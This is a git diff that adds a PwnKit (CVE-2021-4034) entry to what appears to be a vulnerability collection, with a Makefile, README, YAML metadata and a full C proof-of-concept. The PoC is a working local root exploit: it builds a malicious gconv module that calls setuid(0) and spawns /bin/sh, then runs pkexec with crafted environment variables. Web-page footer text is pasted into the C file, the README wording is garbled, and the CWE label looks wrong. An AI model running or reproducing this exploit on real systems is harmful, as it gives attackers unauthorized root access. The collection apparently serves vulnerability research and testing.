diff --git a/cve/linux-kernel/2021/CVE-2021-4034/.keep b/cve/linux-kernel/2021/CVE-2021-4034/.keep
new file mode 100644
index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391
diff --git a/cve/linux-kernel/2021/CVE-2021-4034/Makefile b/cve/linux-kernel/2021/CVE-2021-4034/Makefile
new file mode 100644
index 0000000000000000000000000000000000000000..6037d3b5bd2176b3f8c2c17856d443c90f76d1bf
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-4034/Makefile
@@ -0,0 +1,14 @@
+CC = gcc
+
+EFLAGS = -Wall -Wextra -O2 -g -D_GNU_SOURCE
+SFLAGS = --shared -fPIC 
+
+TARGET=exploit
+INCLUDE= include
+SOURCE= src
+
+all:
+	$(CC) $(SOURCE)/$(TARGET).c -o $(TARGET) $(EFLAGS) -I $(INCLUDE) 
+	$(CC) $(SOURCE)/$(TARGET)-so.c -o $(TARGET).so $(EFLAGS) $(SFLAGS) -I $(INCLUDE) 
+clean: 
+	$(RM) -rf .sus $(TARGET)* GCONV_PATH=.
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/CVE-2021-4034/README.md b/cve/linux-kernel/2021/CVE-2021-4034/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..3ad5c25657454dd42f234b14ca72f0dccf25b6c4
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-4034/README.md
@@ -0,0 +1,4 @@
+linux system service bug gives root on all major distros, exploit published A vulnerability in the pkexec component of Polkit identified as CVE-2021-4034 PwnKit is present in the default configuration of all major Linux distributions and can be exploited to gain privileges over the compj researchers.
+
+ref:https://github.com/Anonymous-Family/CVE-2021-4034
+
diff --git a/cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c b/cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c
new file mode 100644
index 0000000000000000000000000000000000000000..6a5112bbf463faaf5260a30ef0c8b13a0b5c4770
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c
@@ -0,0 +1,37 @@
+/*
+ * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis <moo@arthepsy.eu>
+ * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+char *shell = 
+	"#include <stdio.h>\n"
+	"#include <stdlib.h>\n"
+	"#include <unistd.h>\n\n"
+	"void gconv() {}\n"
+	"void gconv_init() {\n"
+	"	setuid(0); setgid(0);\n"
+	"	seteuid(0); setegid(0);\n"
+	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
+	"	exit(0);\n"
+	"}";
+
+int main(int argc, char *argv[]) {
+	FILE *fp;
+	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
+	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
+	fp = fopen("pwnkit/pwnkit.c", "w");
+	fprintf(fp, "%s", shell);
+	fclose(fp);
+	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
+	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
+	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
+}
+Footer
+© 2023 GitHub, Inc.
+Footer navigation
+Terms
+Privacy
+Security
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..0c23bdc66596442c1339c316aa8f0083650d6b1d
--- /dev/null
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml
@@ -0,0 +1,17 @@
+id: CVE-2021-4034
+source: https://github.com/Anonymous-Family/CVE-2021-4034
+info:
+  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+  severity: high
+  description: |
+    Linux Linux, A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
+  reference:
+    - https://www.anquanke.com/post/id/267774#h2-1
+    - https://nvd.nist.gov/vuln/detail/cve-2021-4034
+    - https://github.com/Anonymous-Family/CVE-2021-4034/
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2021-4034
+    cwe-id: CWE-125
+  tags: cve2021,权限提升
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index caeacc6e702250a29a293233beb931db01606d04..23533074b5d4b9674a0be299948c88d9e1bbd9ce 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -31,6 +31,7 @@ cve:
   Influx-DB:
     - CVE-2019-20933
   linux-kernel:
+    - CVE-2021-4034
     - CVE-2021-4204
     - CVE-2021-22555
     - CVE-2021-4154